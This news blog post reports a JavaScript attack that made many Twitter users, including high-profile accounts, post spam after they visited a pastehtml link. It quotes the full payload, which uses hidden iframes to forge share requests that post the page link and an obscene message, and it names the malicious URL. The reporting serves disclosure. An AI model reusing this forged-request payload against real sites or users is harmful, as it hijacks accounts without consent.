Javascript Web Exploit Attacks Huge Numbers of High-Profile Twitter Users

A JavaScript web compromise has apparently affected a large amount of Twitter users.

On Sunday afternoon, a large number of Twitter accounts were compromised by users who inadvertently were lured into viewing the following URL,

http://pastehtml.com/view/1b7xk3b.html

which contains the following Javascript code:

var el1 = document.createElement('iframe'); var el2 = document.createElement('iframe'); el1.style.visibility="hidden"; el2.style.visibility="hidden"; el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location; el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats"; document.getElementsByTagName("body")[0].appendChild(el1); document.getElementsByTagName("body")[0].appendChild(el2);

Some of the most prominent Twitter posters with very large follower lists, such as @zee, web cartoonist @oatmeal and Tech Blogger Robert Scoble, @scobleizer have been affected, along with hundreds of thousands of their followers which also clicked on the malicious links.

The script, which causes a Twitter post to appear that directs browsers to execute the Javascript source code, and then posts an embarrassingly obscene message about goats (you can see it in the code snippet above) appears to affect only certain Windows-based browsers, as I was able to view and execute the source of the page safely using Chrome on Linux and my own Twitter account was not compromised.

I haven't been able to determine if any Mac or iOS or Android users have been compromised by this exploit yet, so please provide me with an update if you use Safari or another Mac browser or alternative OS and you've been hit.

UPDATE: At 1:49PM, EDT on Sunday, Twitter, on its status blog has notified users that the compromise has been blocked on the new and old versions of the Twitter Web UI and they are removing all the Tweets which have been sent with the cross-site compromise link and the offensive message.

Newsletters

You have been successfully signed up. To sign up for more newsletters or to manage your account, visit the Newsletter Subscription Center.
Subscription failed.
See All